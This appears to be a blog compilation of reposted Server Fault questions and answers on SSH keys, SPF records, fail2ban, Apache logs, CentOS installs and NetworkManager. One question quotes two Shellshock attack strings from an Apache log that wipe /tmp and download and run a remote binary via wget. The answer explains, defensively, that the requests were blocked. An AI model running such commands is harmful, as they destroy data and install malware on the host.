SSH: Safe for client to host private RSA key?

user345807 asked:

Is it safe to generate a public/private key pair on the server, add the public key to the authorized_keys list, and then copy the private key to each client, as described here (http://www.rebol.com/docs/ssh-auto-login.html) Assuming you maintain permanent control over each client? (i.e. same user, many computers).

Typical procedure is to generate the public/private key pair on the client, and then add the client’s public key to the authorized_keys list on the server as described here (http://www.linuxproblem.org/art_9.html). With this method, if you have several client computers, each much must be concatenated to the authorized_keys list and maintained over time.


I answered:

Congratulations, you’ve found an Internet tutorial with bad advice.

The problem with using a single keypair for multiple computers occurs when any one of the computers is compromised. Then you have no choice but to revoke the keypair everywhere and rekey every single computer which was using that keypair. You should always use unique keypairs per machine and per user, to limit the damage that a compromised key can do.

As for that tutorial, it’s amazingly bad advice to generate the keypair on the server and copy the private key to the client. This is entirely backward. Instead, the keypair should be generated on the client and the public key copied to the server. There is even a helper script ssh-copy-id which does exactly this, and along the way makes sure all permissions are correct, the client gets the server’s host key, etc.

There may indeed be situations where you want to centrally manage users’ identity keys, e.g. for automated scripts, but in this case you really should do this from a third host, or ideally from a configuration management system such as puppet.


View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

OpenShift access via terminal (SSH) [Permission denied (publickey,gssapi-keyex,gssapi-with-mic).]

Karl Morrison asked:

I’m currently sitting on Ubuntu and would like remote access to my application on OpenShift. I have done the following to create a ssh-rsa key (I’ve replaced the fingerprint with xx:xx…):

> mkdir ~/.ssh
> chmod 700 ~/.ssh
> ssh-keygen -t rsa                                      
Generating public/private rsa key pair.
Enter file in which to save the key (/home/karl/.ssh/id_rsa): openshiftKey
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in openshiftKey.
Your public key has been saved in openshiftKey.pub.
The key fingerprint is:
xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx karl@karllaptop
The key's randomart image is:
+--[ RSA 2048]----+
|                 |
... the rest of the image

This creates two files(notice they are not in ~/.ssh):

~/openshiftKey
~/openshiftKey.pub

I do not know where these files belong, the examples and tutorials say nothing of moving them.

I open the openshiftKey.pub and copy the code:

enter image description here

I paste it into Openshift:

enter image description here

Click save:

enter image description here

Go back to the application settings page and copy the ssh link:

enter image description here

And on my terminal try and connect:

enter image description here

I am sorry as I am new to ssh in this degree, what am I doing wrong?


I answered:

Here is a problem:

Enter file in which to save the key (/home/karl/.ssh/id_rsa): openshiftKey

You didn’t accept the default, and gave your key a specific filename.

If you had accepted the default, then ssh would simply look in that default location anytime you make a remote connection to anywhere, and try to use that key.

In order to use a key other than the default key, you have to specify it explicitly when using ssh, for instance:

ssh -i $HOME/openshiftKey bad-example.rhcloud.com

But you’ll probably want to put the key into its default location, so that you can use the rhc command line tool to manage your gears. Trying to feed it ssh options is … rather hairy.


View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

Does "~all" in the middle of an SPF record signal the end of the record when it is parsed?

whelanska asked:

Our company’s SPF record format is as follows:

“v=spf1 include:_spf.google.com ~all a mx ip4:X.X.0.0/23 include:spf.example.com ?all”

So we have an “~all” in the middle of our SPF record. On the openspf.com website, they say this regarding the “all” mechanism:

This mechanism always matches. It usually goes at the end of the SPF
record.

So, they don’t say “all” HAS to go at the end of the SPF record, but that it USUALLY goes at the end.

At our company, lately we’ve been seeing some soft fails in emails sent from servers listed in our SPF record, yet our SPF record passes all validation tools I’ve found so far.

What I’m wondering is, would this “~all” directly after the include for Google Apps (_spf.google.com) cause parsing to stop and not recognize the remaining pieces of the SPF record? Would passing vs. soft-failing depend on who is parsing it and their specific implementation of how they process SPF records? Is there any reason to have an “all” mechanism that is not at the end of an SPF record?

And yes, I know we could just change our SPF record. This question is more about clarifying how this all works and not necessarily about resolving our specific situation.


I answered:

RFC 7208 § 5.1 is explicit about this: after all appears, everything after it MUST be ignored.

Mechanisms after “all” will never be tested. Mechanisms listed after “all” MUST be ignored. Any “redirect” modifier (Section 6.1) MUST be ignored when there is an “all” mechanism in the record, regardless of the relative ordering of the terms.

The RFC it obsoleted, RFC 4408, said much the same thing; the newer version of the RFC simply clarifies the intention.

Mechanisms after “all” will never be tested. Any “redirect” modifier (Section 6.1) has no effect when there is an “all” mechanism.

So, conforming implementations of SPF will completely ignore everything after the first ~all. This doesn’t mean, however, that every implementation conforms to the spec.

It’s not at all clear why an online validation tool would not catch this misconfiguration, but if you intend for anything after the first all to be used, you should correct the record, as proper implementations will ignore it.


View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

Installing Samplicator on CentOS

Eric asked:

I’m trying to install Samplicator to test Netflow central collector and then forwarding to other collectors from there. I mainly want to use Samplicator due to it being able to easily sample the Netflow data and/or send the full raw feed.

When I download it from the github repo, there is no configure file by default like the install instructions say. I’ve tried using autoconf and various automake commands to get configure to show up and it does finally, but says

config.status: error: cannot find input file: `Makefile.in'

Has anyone else had experience installing this software recently? I know it hasn’t been updated in quite a while.

Thanks,
Eric


I answered:

Projects usually include a bootstrap script that generates the necessary GNU autoconf environment. These files aren’t checked into git, so you’ll need to run the script to generate them yourself.

Unfortunately this particular project includes no such script, so you’ll have to do it yourself. These items need to be run to generate configure and its necessary friends:

aclocal
libtoolize
autoconf
automake

Depending on the program, they may also need various options passed to them. Contact the program author if you have trouble.


View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

Loading fail2ban rules to iptables using iptables-persistent

Firze asked:

I am using iptables-persistent package to reload my iptables on boot. And I have been thinking should I add the fail2ban rules to the loaded config file? Now I am seeing they are duplicated.

This is my firewall config:

*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:fail2ban-ssh - [0:0]

-A INPUT -p tcp -m multiport --dports 22 -j fail2ban-ssh

# Accepts SSH connection
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

# HTTP
-A INPUT -p tcp --dport 80 -j ACCEPT

# SSH
-A INPUT -p tcp --dport 22 -j ACCEPT

# MariaDB (private network)
-A INPUT -i eth1 -p tcp -m tcp --dport 3306 -j ACCEPT

# loopback device
-I INPUT 1 -i lo -j ACCEPT

# Allow ping
-A INPUT -p icmp -j ACCEPT

# Drops all remaining traffic
-A INPUT -j DROP

-A fail2ban-ssh -j RETURN

COMMIT

The fail2ban lines are duplicated when I reboot and run iptables -S:

-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-N fail2ban-ssh
-A INPUT -p tcp -m multiport --dports 22 -j fail2ban-ssh
-A INPUT -i lo -j ACCEPT
-A INPUT -p tcp -m tcp --dport 8080 -j ACCEPT
-A INPUT -p tcp -m multiport --dports 22 -j fail2ban-ssh
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p icmp -j ACCEPT
-A INPUT -j DROP
-A fail2ban-ssh -j RETURN
-A fail2ban-ssh -j RETURN

So should I remove those 2 fail2ban lines from my config?


I answered:

Don’t bother. fail2ban maintains its own state and will recreate its firewall rules when restarted.


View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

Upgrading to PHP 5.6.7 using remi repos

AmadeusDrZaius asked:

I have php56 enabled in my remi.repo file and none of the other sections are enabled.

[remi-php56]
name=Les RPM de remi de PHP 5.6 pour Enterprise Linux 6 - $basearch
#baseurl=http://rpms.famillecollet.com/enterprise/6/php56/$basearch/
mirrorlist=http://rpms.famillecollet.com/enterprise/6/php56/mirror
# WARNING: If you enable this repository, you must also enable "remi"
enabled=1
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-remi

When I run yum install php, I get an error saying that my httpd-mmn version is wrong, but the version it requires is an old one. I find this very odd, because this process worked on the last server I updated.

Is this a bug in my version of remi.repo?


I answered:

As it told you specifically:

# WARNING: If you enable this repository, you must also enable "remi"

View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

Should I worry about requests that get – client denied by server configuration, apache logs

dav asked:

I have a server with debian 7. I was checking the apache error log file and saw a few lines like this

[Fri Mar 20 04:56:48 2015] [error] [client 222.66.95.253] client denied by server configuration: /home/username/www/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-bbce >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bbce >> /tmp/Run.sh;echo /tmp/China.Z-bbce >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"

[Mon Mar 16 16:58:15 2015] [error] [client 210.35.74.116] client denied by server configuration: /home/username/www/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.180.31.43:9574/xudpASD -O /tmp/China.Z-wwyyxb0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wwyyxb0 >> /tmp/Run.sh;echo /tmp/China.Z-wwyyxb0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"

I might be mistaken, but because of this part () { :; }; I think someone was trying to use the shellshock bug.

But independent from whether this is shellshock or not, the question is – if I have lines in logs with message

client denied by server configuration

is this smth that I should worry about, or because the request was declined I can ignore it – being sure that no malicious scripts were downloaded/executed ?


I answered:

“Client denied by server configuration” means that the request was blocked by a Require directive (or in older versions of Apache, the Allow/Deny directives), by a rewrite rule, or by some other Apache module. In particular it means the request was never passed on to an external handler, so the exploit could not have a chance to run. The client was just immediately served a 403 Forbidden error.


View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

CentOS 7 installer: blank screen

the-wabbit asked:

I am trying to figure out CentOS 7 unattended network (PXE) installations in my setup, but the installer always ends up running into a black screen without interaction options. This is being tried in a 64-bit VM (VMWare Workstation or Oracle VirtualBox).

The installation seems to lift off normally, the Kernel boots up, initrd is loaded and startup scripts loading the kickstart file and the installer data off my repository server (via HTTP) have run more or less without errors:
first stage

At this stage, attempts to download updates.img and product.img are reported as failing as they are not present in the repository I am using.

The install seems to proceed without errors:
installer loading

up to the point where it is mentioning that GNOME has started:
GNOME started

after which there is a screen mode switch and everything goes blank.

Things tried so far without success:

  • Console switch attempts using Ctrl+Alt+Fx do not work
  • Trying to kill X11 using Ctrl+Alt+Backspace does not produce any result
  • I also have tried text and cmdline Kickstart installation options as well as nomodeset text kernel parameters to force a text mode install as I suspected an X11 driver incompatibility
  • I have tried VMWare Workstation as well as Oracle VirtualBox as the Hypervisor for my VM – to no avail
  • I suspected a problem with my Kickstart script at which point I have ripped a sample one from here replacing the --url= parameter’s data by http://ftp.tu-chemnitz.de/pub/linux/centos/7/os/x86_64/ (the installation mirror I want to use)
  • I have tried using another mirror which changed nothing except for the download time of the 278M-sized installer image (presumably LiveOS/squashfs.img)

What is going wrong here and how would I fix my install?


I answered:

What is this about GNOME Display Manager? That shouldn’t be present on an installation-only media. The fact that it is present makes me think you mistakenly downloaded a live media image. Go back to your mirror and get the correct netinstall image.


View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

Are there good reasons not to disable /etc/init.d/network on centos-7 in favor of exclusively using NetworkManager?

Ben asked:

rhel-7/centos-7 network configuration is bizarre — largely because they are straddling between the old (shell scripts usually invoked by /etc/init.d/network which mutate configuration state of network devices) and new way (NetworkManager daemon which manages network device settings).

To the best of my understanding — rhel7/centos-7 are simultaneously supporting both configuration modes for network devices. They use a plugin for NetworkManager called ifcfg-rh which reads/writes network configuration from /etc/sysconfig/network-scripts/ifcfg-* with configuration going into NetworkManager from these files at startup, and changes made via NetworkManager (sometimes) getting serialized back to these files through ifcfg-rh plugin during system operation (which involves translations to/from the weird legacy configuration file format in /etc/sysconfig/network-scripts/ifcfg-* — a format which was originally interpreted by a pile of shell scripts.) This situation scares me and makes me think about dragons.

My take is that straddling the two worlds is confusing and error prone — particularly if you have to automate network configuration changes for various reasons, and also when you have to educate co-workers about ‘new way’ of doing things on modern systems — people who might forget and cause configuration control to drift out of sync between the two worlds …

So, to avoid the potential for weird bugs, I want to just fully adopt NetworkManager and get rid of the legacy options. Should I expect side effects with the following approach:

> cat /etc/NetworkManager/NetworkManager.conf
[main]
plugin=keyfile

> cat /etc/NetworkManager/system-connections/dhcp-profile.conf
[connection]
id=dhcp
uuid=50263651-4f14-46bc-8dd8-818bf0fe3367
type=ethernet
autoconnect=true

[ipv6]
method=auto

[ipv4]
method=auto
> systemctl disable networking
> systemctl enable NetworkManager

I this should ensure the keyfile formatted file is source of truth for all NetworkManager settings — and should remove all behaviors which depend on the contents of
– /etc/sysconfig/network-scripts/*
– /etc/sysconfig/network
– /etc/init.d/network

It seems to work and behaves normally so far … I’m a little bit worried there might be side-effects from disabling the /etc/init.d/network ‘service’ … I don’t think there are any reasons why /etc/init.d/network should still be called in a fully NetworkManager world …?

Does anybody know of behaviors this would break or reasons this wouldn’t be a good idea?


I answered:

If you’re using NetworkManager, there is no reason to – and you should not – enable the legacy network service.

Conversely, if you’re using the legacy network service, you should not enable or start NetworkManager.

You might have breakage if you have legacy scripts that expect to use the old network service and don’t understand NetworkManager. These should be adapted as appropriate, if possible. Otherwise, you can always use the old network service.


View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.

How to get ssh to automatically use a certain port for a specific server?

Ghopper21 asked:

I use ssh to get into a specific server on a specific port as normal:

ssh -p <port_number> <server_name>

How do I configure ssh to automatically use the right port number for a specific server, so that I don’t have to enter the -p <port_number> parameter? Note different servers I connect to will have different port numbers.


I answered:

Put it in your $HOME/.ssh/config file. For example:

Host bad.example.com
    Port 2222

Host *
    Port 22

View the full question and answer on Server Fault.

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.